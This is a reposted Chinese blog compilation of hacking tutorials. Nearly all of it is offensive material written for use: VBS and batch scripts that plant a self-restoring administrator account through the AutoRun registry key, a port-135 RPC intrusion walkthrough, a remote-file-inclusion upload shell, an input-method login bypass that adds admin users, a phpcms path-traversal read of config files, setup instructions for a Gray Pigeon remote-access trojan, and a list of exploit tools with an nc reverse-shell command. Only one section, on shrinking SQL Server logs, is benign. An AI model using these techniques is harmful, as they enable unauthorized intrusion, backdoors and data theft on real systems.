【转】不死帐号的另类建立

【转】不死帐号的另类建立不死帐号的另类建立建立不死用户朋友给的启发,注册表里键值HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CommandProcessorAutoRun可以建立系统自动运行程序如:c:\1.exe

不死帐号的另类建立

建立不死用户

朋友给的启发,注册表里键值

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor

AutoRun 可以建立系统自动运行程序

如:c:\1.exe

这样 你当打开cmd时候他会运行

如 过 编译个vbs脚本 的 话

可以调用bat 文件就可以创建不死用户

vbs 内容:

Set ws = CreateObject(“Wscript.Shell”)

ws.run “cmd /c yexu.bat”,vbhide

http://www.cn99.com/cgi-bin/getmsg/body?listname=diannao520&id=2

bat 内容:

net user yexu killyou /add

net localgroup administrators yexu /add

net user yexu /active:yes

ok了 这样你无论在dos里删除他还是在计算机管理删除他

只要你动下鼠标他就会 在加 用户可以测试

建立不死帐号方法2

dim wsh

set wsh=createobject(“wscript.shell”)

wsh.run “net user guest /active:yes”,0 (激活guest账号)

wsh.run “net user guest hacker”,0 (修改guest密码为hacker)

wsh.run “net localgroup administrators guest /add”,0 (添加guest到管理组)

然后把这个.txt文件的扩展名改为 .vbs即可

然后打开注册表修改注册标里面的:

HKEY_local_machine\software\microsoft\command processor\autorun

在键值里面加入你vbs文件的路径就ok,然后运行vbs文件,不死账号出来拉

回到目录
 

快速利用135端口入侵个人电脑  

发表于: 2008-4-13 00:27 作者: 麦迪 来源: 中国电脑网-社区门户

通过135端口入侵实际上是利用RPC漏洞来攻击计算机的。一般情况下135端口主要用于使用RPC(Remote Procedure Call,远程过程调用)

  协议并提供DCOM(分布式组件对象模型)服务,通过RPC可以保证在一台计算机上运行的程序可以顺利地 执行远程计算机上的代码;

  使用DCOM可以通过网络直接进行通信,能够跨包括HTTP协议在内的多种网络传输。RPC本身在处理通过TCP/IP的消息交换部分有一个漏洞,该漏洞是由于错误地处理格式不正确的消息造成的。会影响到RPC与DCOM之间的一个接口,该接口侦听的端口就是135。

  下面我就来介绍一下通过135端口入侵的方法。

  (1)通过135端口入侵,攻击者首先需要查找网络上存在135端口漏洞的主机地址,在查找此类主机过程中,可以使用一些扫描工具,比如SuperScan就是典型的端口工具之一。在SuperScan”开始”文本框中输入需要扫描的起始地址,然后在”结束”文本框里填写好扫描结束的IP地址,在”扫描类型”选项中选择”所有端口定义”单选按钮,并在右侧的文本框中输入”135″。再点击”开始”按钮即可开始扫描。扫描结束后,在下方的列表中可以查看目标主机打开的端口。然后再点击”Save”按钮选好保存路径,把里面有漏洞的IP整理下即可。

  (2)得到有漏洞后,我们还有一个功能强大的扫描工具,比如NTSscn汉化版。然后在”主机文件”处点击”打开”按钮找到我们刚才保存的IP路径,在连接共享$处选择”WMI扫描”,在”扫描打开端口的主机”处填写135端口。最后点击”开始”即可。要不了多久就会有结果显示。

  (3)获得漏洞主机用户名以后,我们需要一个开启的工具,那就是Recton v2.5。好了,万事具备之欠那”东风”拉。把刚刚扫描的IP输入TELNET界面的”远程主机”处,以及用户名和密码,不过一般情况下密码都是空。下一步点击”开始执行”按钮等待把TELNET打开吧。打开后按WIN+R输入CMD进入再输入Telnet IP 回车,会提示让你输入用户名,把用户名输入后,回车即可进入主机。而且得到的还是SYSTEM权限。

  下一步就是为我们加了拥有管理员权限的用户,看看我杰作。最后我们可以上传一些远程性木马软件作为后门,比如灰鸽子,冰河等。在这里我就不在展示。我还是喜欢3389端口,那我就给他上传个开启3389的脚本,不过对于开启3389端口的工具网上还真的不少,比如Recton v2.5就有这个功能。好了3389端口已经成功开启大家看我连接的。怎么样,就这么轻松得到了一台。是不是很过瘾

回到目录
 

教菜鸟如何清除SQL server日志  

这个问题很多人受到了困扰,日志动辄十几个g

问:SQLServer中的事务日志应该怎样压缩和删除?

答:具体方法有3种。

方法一:

第一步:

backup log database_name with no_log或者 backup log database_name with truncate_only

— no_log和truncate_only是在这里是同义的,随便执行哪一句都可以。

第二步:

1.收缩特定数据库的所有数据和日志文件,执行:

dbcc shrinkdatabase (database_name,[,target_percent])

— database_name是要收缩的数据库名称;target_percent是数据库收缩后的数据库文件中所要的剩余可用空间百分比。

2.收缩一次一个特定数据库中的数据或日志文件,执行

dbcc shrinkfile(file_id,[,target_size])

— file_id是要收缩的文件的标识 (ID) 号,若要获得文件 ID,请使用 FILE_ID 函数或在当前数据库中搜索 sysfiles;target_size是用兆字节表示的所要的文件大小(用整数表示)。如果没有指定,dbcc shrinkfile 将文件大小减少到默认文件大小。两个dbcc都可以带上参数notruncate或truncateonly,具体意思查看联机帮助.

方法二:

第一步:

先备份整个数据库以备不测 。

第二步:

备份结束后,在Query Analyzer中执行如下的语句:

exec sp_detach_db yourDBName,true

–卸除这个DB在MSSQL中的注册信息

第三步:

到日志的物理文件所在的目录中去删除该日志文件或者将该日志文件移出该目录

第四步:

在Query Analyzer中执行如下的语句:

exec sp_attach_single_file_db yourDBName,’d:\mssql\data\yourDBName_data.mdf ‘

–以单文件的方式注册该DB,如果成功则MSSQL将自动为这个DB生成一个500K的日志文件。

方法三:

1. 进入企业管理器,选中数据库,比如demo

2. 所有任务->分离数据库

3. 到数据库文件的存放目录,将MuOnline_log.LDF文件删除,以防万一,你可以拷出去

4. 企业管理器->附加数据库,选muonline,这个时候你会看见日志文件这项是一个叉,不要紧,继续,此时数据库就会提示你该数据库无日志是否创建一个新的,确定就是了。

5. 记得数据库重新附加后用户要重新设置一下。

如果以后,不想要它变大:

SQL2000下使用:

在数据库上点右键->属性->选项->故障恢复-模型-选择-简单模型。

或用SQL语句:

alter database 数据库名 set recovery simple

回到目录
 

入侵php网站就这么简单  

今天上网看到了一个网站的URL,引发了我的无限联想,URL形http://xxx.org.tw/index.php?rurl=page01.php,看等于号后面的那部分,明明就是个php文件嘛,我猜想index.php的作用就是将其他php文件放在它的框架内显示出来。如果我们修改这个URL,也许能做些什么。然后我尝试修改URL,看看它能不能显示出boot.ini,提http://xxx.org.tw/index.php?rurl=c:\boot.ini,成功显示出来了.于是在自己的电脑上开了IIS,将phpspy放到目录里,命名为2.php,注意,我这里是没法解析php文件的,只能将其作为文本文件显示.然后提http://xxx.org.tw/index.php?rurl=http://我的IP/2.php,发现我的phpspy作为网页的一部分显示出来了.

这实际上phpspy还没有存在服务器上,只不过远程包含罢了。形成这种情况的原因是因为index.php里面包含类似于下面的代码:

if ($_GET[page]) {

include $_GET[page];

} else {

include “index.php”;

}

没有经过任何的过滤,就将所请求的文件包含进来了,这倒方便了我们拿phpshell。我们可以让其将php的一句话木马包含进来,然后用客户端连接就行了。我这里不用这个方法,换个其他方法,首先将本地的2.php内容写为:

<  ?copy($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);?>

这个的意思就是将指定的文件转存到当前目录下,然后在写一个up.htm,内容如下:

<  form ENCTYPE=”multipart/form-data” ACTION=”http://xxx.org.tw/index.php?rurl=http://我的IP/2.php?” METHOD=”POST”>

<  input NAME=”MyFile” TYPE=”file”>

<   input VALUE=”提交” TYPE=”submit”>

<  /form>

注意里面的网址要填对,然后就可以上传了.然后发现phpshell就是管理员权限.这实际就是远程文件包含漏洞.

在另外一个网站上,我也发现了缺少验证的脚本,虽然不至于让服务器沦陷,但是也泄露了不少信息。这个网站提供一些文件的下载,下载的URL形如

回到目录
 

又见输入法漏洞  

追溯到很多年以前,在windows 2000的时代,黑客可以利用输入法漏洞在远程桌面的登录界面前添加管理员帐户,后来微软出了相应的补丁,凡是打了补丁的机器,我们就不能通过ctrl+左shift切换到想要的输入法了。 但是远程桌面是开源的,它在建立连接的开始,是允许我们指定任意的输入法的(前提是远程主机安装了该输入法),所以如果修改相关代码,我们还是可以在远程桌面的登录界面前调出第三方输入法的。下面看实战。

Windows 2003上实战

这里的输入法以极点五笔5.1为例

操作系统是windows server 2003,需要注意的是我们在SP1上的实验失败了(目前正找原因), SP2是可以的,只要不是SP1就行了。

下面介绍一下Imerdp_Gui.exe这个工具,它是需要.Net支持的,选择想要的输入法(必须是远程服务器已经安装的),填上IP地址,就可以连接远程桌面了.

如果你没有.Net支持,没关系,可以用命令行的ImeRdp.exe,其实前面的Imerdp_Gui.exe也是调用的ImeRdp.exe。用法:ImeRdp.exe -i [ime文件] [IP:PORT],ime文件是每个输入法都会有的文件,在system32里,例如双拼就是winsp.ime.

然后就可以连接了,请大家注意图中标出来的输入法已经成为极点五笔了,在极点五笔中,输入”;OO”回车,就可以进入系统设置了,在这里,点击界面设置,你会发现有个地方可以让你选择背景,标记出来的位置

点击之后,出现了”打开”选择框,注意下面的文件类型,它只允许显示bmp文件,无法让它显示所有文件,我们在这个选择框里随便找个文件夹,右键选属性,之后在属性里选择自定义选项卡,然后点更改图标,在更改图标这里,点击浏览,后来跳出的选择框就可以显示所有文件了,马上来到system32,给net.exe在桌面建一个快捷方式,再来到桌面,右键点击该快捷方式,选属性.在属性中,在原有路径里加上user renyuji [密码] /add,点确定。然后的事就是右键点击该快捷方式,选打开,这样执行的命令就是net user renyuji [密码] /add。再之后就是将该快捷方式的路径里的net.exe后加上localgroup administrators renyuji /add,再次右键打开,然后用mstsc登陆就行了,renyuji这个管理员被添加上了.

后记

 这个方法的思路是很新颖的,我本来以为在今天很难见到输入法漏洞了,想不到原来客户端是可以决定输入法的。利用起来的唯一麻烦就是你不知道远程主机装了哪种第三方输入法,有兴趣的人可以编一个扫描工具,尝试调用远程主机的输入法,如果遇到能利用的输入法,拿到管理员权限就如同探囊取物。当然,这种输入法漏洞作为后门也不错(可以自己尝试修改ime文件的文件名或内容,我觉得还能挖掘出好玩的东西)。

受影响系统:

windows 2000 server sp4

windows 2003 server sp2

windows 2003 server

windows vista

据cnqing提供的信息,vista上可以得到管理员权限的输入法有:sogou输入法,万能五笔,极点五笔,拼音加加。Windows 2003上目前只有极点五笔和拼音加加。更多的输入法利用还等着大家自己去实验。根据我的推测,在英文操作系统里,只要安装了第三方输入法,也是可以调用出来并被利用的。而对于那些非英语国家(拉丁,阿拉伯,日韩等等众多国家)的操作系统同样会出现这个问题。所以,这个漏洞还是很有影响的。

回到目录
 

一次简单的php源代码泄露漏洞发掘  

我们知道在asp中出现得最多的还是sql注入,不过在php中由于magic_quotes_gpc为on的情况下特殊字符会被转义,所以即使有很多时候存在sql注入也无法利用。但是php强大的文件操作功能却使我们能体会到在asp中无法体会的乐趣,我想php自带的文件操作函数能让你为之心跳加快~~嘿嘿

这次我发掘的是phpcms2007的源代码泄露漏洞

再次向Phpcms2007的开源行为致敬!!

开始吧,

findstr /s /n /i readfile *.php >readfile.txt (结果我只给出有用的)

其他的文件操作函数可以自己定义查找

module\picture\show_pic.inc.php:8:readfile($file);

跟进这个文件看看吧,呵呵,比较小,我喜欢

[Copy to clipboard] [ – ]CODE:

defined(‘IN_PHPCMS’) or exit(‘Access Denied’);

require PHPCMS_ROOT.’/module/’.$mod.’/include/common.inc.php’;

isset($src) or exit;

$file = PHPCMS_ROOT.’/’.$PHPCMS[‘uploaddir’].’/’.$CHA[‘channeldir’].’/’.$MOD[‘upload_dir’].’/’.$src;

if(empty($PHP_REFERER) || !strpos($PHP_REFERER, $PHP_DOMAIN)) $file = PHPCMS_ROOT.’/images/error.jpg’;

header(“Content-type:image/pjpeg”);

readfile($file);

?>

一路分析下。。。

先包含文件/module/’.$mod.’/include/common.inc.php

如果存在变量$src则赋予它路径并把值交给变量$file

然后就是就进入if

这里我不看其他的文件简单猜测下应该是判断url路径来源,也就是防盗链的功能

然后就header()一个图片头

呵呵,轻轻松松就readfile($file);

可以看出它没有判断$src的文件类型,如果我们提交一个src=*.php也会被readfile

好吧,在这里漏洞是出现了

不过由于”defined(‘IN_PHPCMS’) or exit(‘Access Denied’);”,所以我们是无法直接利用这个漏洞文件的

只能是在其他包含这个文件的php文件中利用

继续吧

[Copy to clipboard] [ – ]CODE:

findstr /s /i /n show_pic.inc.php *.php >show_pic.inc.php.txt

picture\show_pic.php:4:require PHPCMS_ROOT.”/module/”.$mod.”/show_pic.inc.php”;

进去看看

[Copy to clipboard] [ – ]CODE:

require “./config.inc.php”;

require “../include/common.inc.php”;

require PHPCMS_ROOT.”/module/”.$mod.”/show_pic.inc.php”;

?>

呵呵,要是register_globals为on的话就可以直接利用这个文件读取目标文件了

那就测试吧

官方是演示站是

[Copy to clipboard] [ – ]CODE:

http://demo.phpcms.cn/

那就这样构造url

[Copy to clipboard] [ – ]CODE:

/picture/show_pic.php?src=/../../../config.inc.php

嘿嘿,读取的就是网站的配置文件

直接访问

[Copy to clipboard] [ – ]CODE:

http://demo.phpcms.cn//picture/s … ./../config.inc.php

呵呵,猜测没错!!

那我们可以先访问http://demo.phpcms.cn/抓包

用nc发包

get选项就设置为

[Copy to clipboard] [ – ]CODE:

/picture/show_pic.php?src=/../../../config.inc.php

这里我就用刺猬的一个post提交工具代替了

ok,就分析到这里了

希望大家不要利用这个做违法的事,嘿嘿!!

偶是坏孩子,不通知官方了~?好孩子去通知下。

回到目录
 

路由内网鸽子上线教程  

内网真的很麻烦,我看过一些其他的教程录象说的并不详细,或多或少总是遗漏一些关键部分。

今天就写个详细教程来教教大家怎么样内网上线,保证你100%成功。

首先我们去http://www.3322.org 申请一个域名,申请完毕后,登入,点击管理域名。看左边选择动态域名,然后新建,名字就大家随便选择了。IP地址填写你公网的IP,其他随便。看公网IP应该不用说了吧。用一个显IP的QQ就可以看到。

然后下载3322的客户端http://www.3322.org/dyndnspage/setup.exe,就是CN99QDNS客户端,下载完后安装。在程序里打开CN99DQNS 选择管理帐号,依次输入域名、用户名、口令,点增加,这就可以了(以后每次开鸽子钱打开此客户端,然后更新一下你的域名。)

在F盘新建文件夹,名字为IPIP(名字随便写都可以 在哪个盘也无所谓)。

接着打开鸽子-工具-FTP服务器:主目录就选择刚才建立的文件夹 F:\IPIP\,服务端口21,用户名就用3322申请的,密码一样,欢迎词随便写。

在自动保存目录和端口信息和程序启动时自动开启FTP服务上打勾,然后开启服务。

再来看工具-WEB服务器,主目录同FTP一样 F:\IPIP\,端口写80。

在自动保存目录和端口信息和程序启动时自动开启WEB服务上打勾,然后开启服务。

我们是内网,比如说我的电脑内网IP是192.168.1.3,现在进入陆由器。以TP-LINK的为例,在转发规则/虚拟服务器这一栏里,服务端口:21,IP写你自己的IP:192.168.1.3,协议:ALL。然后启用,再开一个,端口为8000其他同上,重启陆由器。

打开鸽子的服务器配置/自动上线设置。在IP同址HTTP访问地址、DNS解析域名或固定IP:这里填上在3322申请的域名 比如我申请的是aabb.3322.org,这里填上aabb.3322.org 就可以了。然后其他的就随便大家怎么填了,最后生成一个服务端。

打开鸽子自动上线:

FTP服务器填:aabb.3322.ORG,端口:21,用户名和密码就是3322申请的那个。

存放IP的文件,IP.TXT。

IP文件内容:这里很关键,因为我们是内网,所以我们要这样写:

比如说我现在的内网IP是192.168.1.3,外网是:218.16.75.85,这里就写成218.16.75.85:8000。千万不能写内网的IP,现在大家大部分都是动态的IP,所以外网IP变动一次这里就要重新设置。重新开启鸽子时也要重新填写一下XX.XX.XX.XX:8000

回到目录
 

简述常见黑客入侵方法以及工具防范  

工欲善其事,必先利其器,本文简单介绍目前黑客最常使用的一些入侵工具及防御的方法,希望能对大家有所帮助,以助于大家能更好地防御黑客的攻击。  1. 1433端口入侵我爱电脑技术论坛6 K, N8 \7 e# X8 A

 查有1433的机器

SQLScanPass.exe 进行字典暴破(字典是关键)

  最后 SQLTools.exe入侵打造最好的电脑自学交流论坛9 r% W3 L2 R7 {7 r

  对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。

  nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口

{

  (以上反向的,测试成功)

sqlhelloz.exe 入侵ip 1433 (这个是正向连接)

  2. 4899端口入侵

 用4899过滤器.exe,扫描空口令的机器

 N打造最好的电脑自学交流论坛  

  3. 3899的入侵

  对很早的机器,可以试试3389的溢出  对2000的机器,可以试试字典暴破。

0

   4. 80入侵  对sp3以前的机器,可以用webdav入侵;

`打造最好的电脑自学交流论坛

 对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)

 可以利用SQL进行注入。(小榕的注入软件)。

  5. serv-u入侵(21端口)  对5. 004及以下系统,可用溢出入侵。(serv5004.exe)

 E; \- ^% D” E4 n/ y- Y7 N7 F: n  对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)

  对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A, M” N

 6. 554端口

用real554.exe入侵。

  7. 6129端口

  用DameWare6129.exe入侵。

  8. 系统漏洞

利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,

进行溢出入侵。

  9. 3127等端口  可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。

利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。


版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。
如需转载请保留出处:https://bianchenghao.cn/37731.html

(0)
编程小号编程小号

相关推荐

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注